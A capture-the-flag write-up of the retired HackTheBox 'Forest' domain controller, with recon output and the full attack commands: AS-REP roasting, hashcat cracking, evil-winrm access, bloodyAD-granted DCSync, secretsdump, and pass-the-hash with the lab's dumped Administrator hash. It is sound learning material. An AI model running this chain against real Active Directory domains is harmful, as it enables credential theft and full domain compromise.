Machine Info
- IP: 10.129.95.210
- Status: Retired
- Link: https://app.hackthebox.com/machines/Forest
Recon
$ nmap -sSV -p- -oA 1_init_nmap 10.129.95.210
Starting Nmap 7.95 ( https://nmap.org ) at 2026-06-18 20:42 EDT
Nmap scan report for 10.129.95.210
Host is up (0.057s latency).
Not shown: 65511 closed tcp ports (reset)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2026-06-19 00:49:04Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds (workgroup: HTB)
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49670/tcp open msrpc Microsoft Windows RPC
49680/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49681/tcp open msrpc Microsoft Windows RPC
49685/tcp open msrpc Microsoft Windows RPC
49700/tcp open msrpc Microsoft Windows RPC
55838/tcp open msrpc Microsoft Windows RPC
Service Info: Host: FOREST; OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 78.50 seconds
Our initial nmap scan reveals this is definitely a windows domain controller.
Added htb.local and forest.htb.local into the /etc/hosts.
smb
smbclient -N -L \\\\htb.local allows anonymous login but doesn't return any shares.
$ nxc smb htb.local --disks
SMB 10.129.95.210 445 FOREST [*] Windows 10 / Server 2016 Build 14393 x64 (name:FOREST) (domain:htb.local) (signing:True) (SMBv1:True)
$ nxc smb 10.129.95.210 -u '' -p '' -d HTB.LOCAL --pass-pol;
SMB 10.129.95.210 445 FOREST [*] Windows 10 / Server 2016 Build 14393 x64 (name:FOREST) (domain:htb.local) (signing:True) (SMBv1:True)
SMB 10.129.95.210 445 FOREST [+] HTB.LOCAL\:
SMB 10.129.95.210 445 FOREST [+] Dumping password info for domain: HTB
SMB 10.129.95.210 445 FOREST Minimum password length: 7
SMB 10.129.95.210 445 FOREST Password history length: 24
SMB 10.129.95.210 445 FOREST Maximum password age: Not Set
SMB 10.129.95.210 445 FOREST
SMB 10.129.95.210 445 FOREST Password Complexity Flags: 000000
SMB 10.129.95.210 445 FOREST Domain Refuse Password Change: 0
SMB 10.129.95.210 445 FOREST Domain Password Store Cleartext: 0
SMB 10.129.95.210 445 FOREST Domain Password Lockout Admins: 0
SMB 10.129.95.210 445 FOREST Domain Password No Clear Change: 0
SMB 10.129.95.210 445 FOREST Domain Password No Anon Change: 0
SMB 10.129.95.210 445 FOREST Domain Password Complex: 0
SMB 10.129.95.210 445 FOREST
SMB 10.129.95.210 445 FOREST Minimum password age: 1 day 4 minutes
SMB 10.129.95.210 445 FOREST Reset Account Lockout Counter: 30 minutes
SMB 10.129.95.210 445 FOREST Locked Account Duration: 30 minutes
SMB 10.129.95.210 445 FOREST Account Lockout Threshold: None
SMB 10.129.95.210 445 FOREST Forced Log off Time: Not Set
This returns the name, domain and server build. We also see there is no account lockout threshold.
ldap
LDAP also allows anonymous login.
$ nxc ldap forest.htb.local --dns-server 10.129.95.210 -d HTB.LOCAL -u '' -p '' --users
LDAP 10.129.95.210 389 FOREST [*] Windows 10 / Server 2016 Build 14393 (name:FOREST) (domain:htb.local)
LDAP 10.129.95.210 389 FOREST [+] HTB.LOCAL\:
LDAP 10.129.95.210 389 FOREST [*] Enumerated 31 domain users: HTB.LOCAL
LDAP 10.129.95.210 389 FOREST -Username- -Last PW Set- -BadPW- -Description-
LDAP 10.129.95.210 389 FOREST Administrator 2021-08-30 20:51:58 0 Built-in account for administering the computer/domain
LDAP 10.129.95.210 389 FOREST Guest <never> 0 Built-in account for guest access to the computer/domain
LDAP 10.129.95.210 389 FOREST DefaultAccount <never> 0 A user account managed by the system.
LDAP 10.129.95.210 389 FOREST krbtgt 2019-09-18 06:53:23 0 Key Distribution Center Service Account
LDAP 10.129.95.210 389 FOREST $331000-VK4ADACQNUCA <never> 0
LDAP 10.129.95.210 389 FOREST SM_2c8eef0a09b545acb <never> 0
LDAP 10.129.95.210 389 FOREST SM_ca8c2ed5bdab4dc9b <never> 0
LDAP 10.129.95.210 389 FOREST SM_75a538d3025e4db9a <never> 0
LDAP 10.129.95.210 389 FOREST SM_681f53d4942840e18 <never> 0
LDAP 10.129.95.210 389 FOREST SM_1b41c9286325456bb <never> 0
LDAP 10.129.95.210 389 FOREST SM_9b69f1b9d2cc45549 <never> 0
LDAP 10.129.95.210 389 FOREST SM_7c96b981967141ebb <never> 0
LDAP 10.129.95.210 389 FOREST SM_c75ee099d0a64c91b <never> 0
LDAP 10.129.95.210 389 FOREST SM_1ffab36a2f5f479cb <never> 0
LDAP 10.129.95.210 389 FOREST HealthMailboxc3d7722 2019-09-23 18:51:31 0
LDAP 10.129.95.210 389 FOREST HealthMailboxfc9daad 2019-09-23 18:51:35 0
LDAP 10.129.95.210 389 FOREST HealthMailboxc0a90c9 2019-09-19 07:56:35 0
LDAP 10.129.95.210 389 FOREST HealthMailbox670628e 2019-09-19 07:56:45 0
LDAP 10.129.95.210 389 FOREST HealthMailbox968e74d 2019-09-19 07:56:56 0
LDAP 10.129.95.210 389 FOREST HealthMailbox6ded678 2019-09-19 07:57:06 0
LDAP 10.129.95.210 389 FOREST HealthMailbox83d6781 2019-09-19 07:57:17 0
LDAP 10.129.95.210 389 FOREST HealthMailboxfd87238 2019-09-19 07:57:27 0
LDAP 10.129.95.210 389 FOREST HealthMailboxb01ac64 2019-09-19 07:57:37 0
LDAP 10.129.95.210 389 FOREST HealthMailbox7108a4e 2019-09-19 07:57:48 0
LDAP 10.129.95.210 389 FOREST HealthMailbox0659cc1 2019-09-19 07:57:58 0
LDAP 10.129.95.210 389 FOREST sebastien 2019-09-19 20:29:59 0
LDAP 10.129.95.210 389 FOREST lucinda 2019-09-19 20:44:13 0
LDAP 10.129.95.210 389 FOREST svc-alfresco 2026-06-18 21:05:00 0
LDAP 10.129.95.210 389 FOREST andy 2019-09-22 18:44:16 0
LDAP 10.129.95.210 389 FOREST mark 2019-09-20 18:57:30 0
LDAP 10.129.95.210 389 FOREST santi 2019-09-20 19:02:55 0
Some additional commands ran with nxc ldap
--password-not-requiredreturned 3 disabled accounts.--groupsGroup Membership- Administrators / Domain Admins / GPO Owners: Administrator
- Remote Mgmt Users / Privileged IT Accounts / Service Accounts: svc-alfresco
- Exchange Servers: EXCH01
- test: no members, but interesting
There's a mention of another exchange server, but I cannot seem to find it with dig or nslookup. I set EXCH01 to the same IP in /etc/hosts for now.
A final test is for ASREProasting and KERBEroasting.
$ nxc ldap forest.htb.local --dns-server 10.129.95.210 -d HTB.LOCAL -u svc-alfresco -p '' --asreproast ASREPROAST.txt
LDAP 10.129.95.210 389 FOREST [*] Windows 10 / Server 2016 Build 14393 (name:FOREST) (domain:htb.local)
LDAP 10.129.95.210 389 FOREST [email protected]:664e77945c393d782f226b3383a42f05$18394d700febb061b4edf997cd12b661366893e0ce5dc8eec289b722abbe0152d831ea680070a9e30014802505522e25ba17138ceea638899e32f9a2fec4efba0234addf2edaac3f6e3f846ba753e55d02a8b51e0bca513f1a35b606136c2e8a4c78ac835ad40b41cdba535bf92c4b07affd5e9e6282997f39d070f32a25f6b284e449a4a88820540cfb0a49e7b1e8e63b36e71187f453d861fd86ca0ed120f38831bf494b6a2266988dc354ed13796217b4600a0c5cb79d111c8c9ae7894985fe7fa9f0654a0207408cbe416db2d65f205b28ff41c7c8a7447b62bcbd571cee0c877d4bbd6b .
$ nxc ldap forest.htb.local --dns-server 10.129.95.210 -d HTB.LOCAL -u svc-alfresco -p '' --kerberoast kerberoast.txt
LDAP 10.129.95.210 389 FOREST [*] Windows 10 / Server 2016 Build 14393 (name:FOREST) (domain:htb.local)
LDAP 10.129.95.210 389 FOREST [-] HTB.LOCAL\svc-alfresco:
svc-alfresco
A value returned on the asreproast means we can attempt to crack it.
$ hashcat -m18200 ASREPROAST.txt /usr/share/wordlists/rockyou.txt
...
[email protected]:664e77945c393d782f226b3383a42f05$18394d700febb061b4edf997cd12b661366893e0ce5dc8eec289b722abbe0152d831ea680070a9e30014802505522e25ba17138ceea638899e32f9a2fec4efba0234addf2edaac3f6e3f846ba753e55d02a8b51e0bca513f1a35b606136c2e8a4c78ac835ad40b41cdba535bf92c4b07affd5e9e6282997f39d070f32a25f6b284e449a4a88820540cfb0a49e7b1e8e63b36e71187f453d861fd86ca0ed120f38831bf494b6a2266988dc354ed13796217b4600a0c5cb79d111c8c9ae7894985fe7fa9f0654a0207408cbe416db2d65f205b28ff41c7c8a7447b62bcbd571cee0c877d4bbd6b:s3rvice
Initial Access
With the username and password available, we can use evil-winrm to gain access:
$ evil-winrm -i 10.129.95.210 -u 'svc-alfresco' -p s3rvice
user.txt is found under \svc-alfresco\Desktop\user.txt.
Post-Exploitation
Let's see what other options svc-alfresco can do as it's a member of a Privileged Group.
$ nxc ldap forest.htb.local --dns-server 10.129.95.210 -d HTB.LOCAL -u 'svc-alfresco' -p 's3rvice' --bloodhound -c all
It shows our great-grandparent group, Account Operators, has Generic All over Exchange Windows Permissions. This group has WriteDacl over the root HTB.LOCAL, which then allows us to make changes to the Domain Admins group.
Privilege Escalation
$ bloodyAD -u 'svc-alfresco' -p 's3rvice' -d htb.local --host 10.129.95.210 add groupMember "Exchange Windows Permissions" 'svc-alfresco'
[+] svc-alfresco added to Exchange Windows Permissions
$ bloodyAD -u 'svc-alfresco' -p 's3rvice' -d htb.local --host 10.129.95.210 add dcsync svc-alfresco
[+] svc-alfresco is now able to DCSync
$ impacket-secretsdump -outputfile dcsync -dc-ip 10.129.95.210 HTB/svc-alfresco:[email protected]
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
htb.local\Administrator:500:aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6:::
...
$ evil-winrm -i 10.129.95.210 -u Administrator -H "32693b11e6aa90eb43d32c72a07ceea6"
This sequence of commands follows the identified path in Bloodhound. I noticed we only had a small window after adding ourselves to the group before it seemed to drop back off. Quickly, running the first two AD commands back to back puts ourselves in dcsync mode, which allows us to dump the secrets of all accounts on the domain. With the NTHASH, we are able to pass the hash via winrm to login. The flag is found on the Administrator's desktop.
Conclusion
A nice introductory active directory box. Active Directory is still a weak point for me, so I need more practice on how to filter out noise and identify what certain paths like GenericAll and WriteDacl mean.
It's also a novel way of exploitation for me. Traditionally, when I gain initial access, I am expecting there to be some sort of vulnerable application to exploit for priv-esc. Active Directory has traditionally not been a focus for me, but there is a plethora of information that can be gathered from AD that can help with lateral movement or privilege escalation.